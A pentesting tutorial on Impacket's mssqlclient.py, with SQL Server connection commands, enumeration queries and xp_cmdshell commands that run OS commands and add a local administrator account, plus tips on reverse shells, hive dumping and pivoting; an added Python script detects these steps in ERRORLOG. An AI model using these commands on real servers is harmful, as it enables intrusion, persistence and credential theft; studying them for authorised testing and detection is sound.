Mastering mssqlclient.py for Pentesters

mssqlclient.py is part of the Impacket collection, and it’s one of the go-to tools for enumerating and interacting with Microsoft SQL Servers during a pentest. When you land credentials to a SQL Server or discover an exposed database instance, this tool can open the door to privilege escalation, lateral movement, or even domain compromise.

mssqlclient.py is a command-line SQL client that lets you authenticate to and interact with a Microsoft SQL Server using various authentication mechanisms (Windows auth via NTLM or Kerberos, or SQL Server auth). It’s built using Impacket, which handles all the underlying SMB and RPC protocols.

You can use it to:

  • Enumerate system and database info
  • Execute SQL queries
  • Run OS-level commands using xp_cmdshell
  • Explore privilege escalation vectors
  • Inject payloads for lateral movement

Basic usage:

python3 /path/to/impacket/examples/mssqlclient.py DOMAIN/USERNAME:PASSWORD@TARGET

Examples:

# SQL Auth
python3 mssqlclient.py sa:password123@10.10.10.10

# Windows Auth with NTLM (without -windows-auth the tool falls back to SQL Server auth)
python3 mssqlclient.py -windows-auth DOMAIN/user:pass@10.10.10.10

# With Hashes (NTLM pass-the-hash, so Windows auth is required here too)
python3 mssqlclient.py -windows-auth DOMAIN/user@10.10.10.10 -hashes LMHASH:NTHASH

# With Kerberos
python3 mssqlclient.py -windows-auth DOMAIN/USERNAME@10.10.10.10 -k

Once inside, you’ll see a SQL> prompt.

SELECT @@version;                                              -- Get SQL Server version
SELECT SYSTEM_USER;                                            -- Check logged-in SQL user
SELECT IS_SRVROLEMEMBER('sysadmin');                           -- Check if user is sysadmin (1 = yes)
SELECT name FROM master..syslogins;                            -- List logins
SELECT name FROM master..sysdatabases;                         -- List databases
SELECT name FROM sysobjects WHERE xtype='U';                   -- User tables in the current database
SELECT name FROM syscolumns WHERE id=OBJECT_ID('table_name');  -- Columns of a table
EXEC sp_linkedservers;                                         -- Check for linked servers
EXEC sp_helpserver;                                            -- More info about servers

If you’re lucky and the user has sysadmin, you can use xp_cmdshell to execute OS commands directly.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user pentester P@ssw0rd! /add';
EXEC xp_cmdshell 'net localgroup administrators pentester /add';
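From the defender's side, the sp_configure changes above leave distinctive entries in the SQL Server ERRORLOG, as does the SQL-auth login that precedes them (successful logins are only written when login auditing is set to record them). The following Python is an added example, not part of the original post or of Impacket, that scans constructed sample ERRORLOG lines for those events; the sample lines and the watched option set are assumptions, while the message wording follows SQL Server's standard log text.

```python
import re
from collections import Counter

# Constructed sample ERRORLOG lines (not captured from a real server). The
# message shapes follow what SQL Server writes for login audit events and
# for sp_configure changes such as the xp_cmdshell enablement shown above.
SAMPLE_ERRORLOG = """\
2024-05-01 10:02:11.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.50]
2024-05-01 10:02:12.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.50]
2024-05-01 10:02:14.02 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.10.10.50]
2024-05-01 10:03:40.55 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:03:41.07 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

CONFIG_RE = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
LOGIN_RE = re.compile(
    r"Login (?P<result>succeeded|failed) for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")

# sp_configure options that, once set to 1, let a sysadmin run code outside
# the engine (xp_cmdshell, sp_OACreate via Ole Automation, CLR assemblies).
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}

def scan_errorlog(text):
    """Return (alerts, failed_logins_per_client, sql_auth_successes)."""
    alerts = []
    failed = Counter()
    sql_auth_ok = []
    for line in text.splitlines():
        m = CONFIG_RE.search(line)
        if m:
            if m["opt"] in WATCHED_OPTIONS and m["new"] == "1":
                alerts.append(f"{m['opt']} enabled ({m['old']} -> 1)")
            continue
        m = LOGIN_RE.search(line)
        if not m:
            continue
        if m["result"] == "failed":
            failed[m["client"]] += 1
        elif "SQL Server authentication" in line:
            # Repeated failures followed by a SQL-auth success for 'sa' is the
            # trail the SQL Auth usage shown earlier would leave behind.
            sql_auth_ok.append((m["user"], m["client"]))
    return alerts, dict(failed), sql_auth_ok

if __name__ == "__main__":
    for item in scan_errorlog(SAMPLE_ERRORLOG):
        print(item)
```

Pointing this at a real ERRORLOG means the engine has to be writing login audit events; the sp_configure messages are logged regardless.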

If xp_cmdshell is disabled and you can’t enable it, check if sp_OACreate or CLR assemblies are available.

  • If you can’t authenticate directly but have Net-NTLMv2 hashes, use crackmapexec or john/hashcat to crack them, or try Kerberos ticket abuse if a TGT is available.
  • Always check linked servers — they might allow you to pivot or escalate.
  • If you’re not sysadmin, escalate using stored procedures, impersonation, or UDF injection.
  • Use PowerUpSQL or SQLRecon for deeper AD-integrated enumeration.
  • Drop a reverse shell via xp_cmdshell (e.g., using certutil to fetch payloads).
  • Enable RDP via command line and add your user to Remote Desktop Users.
  • Dump SAM or SYSTEM hives with reg save if you have file system access.
  • Use the SQL Server to pivot deeper into the internal network.

mssqlclient.py is a powerful post-exploitation tool, especially when you’ve got SQL credentials or discover open SQL ports (TCP 1433). It bridges the gap between SQL exploitation and OS-level control, which can easily turn a foothold into full domain compromise if misconfigurations are present.

In the hands of a skilled pentester, this tool becomes a silent weapon.
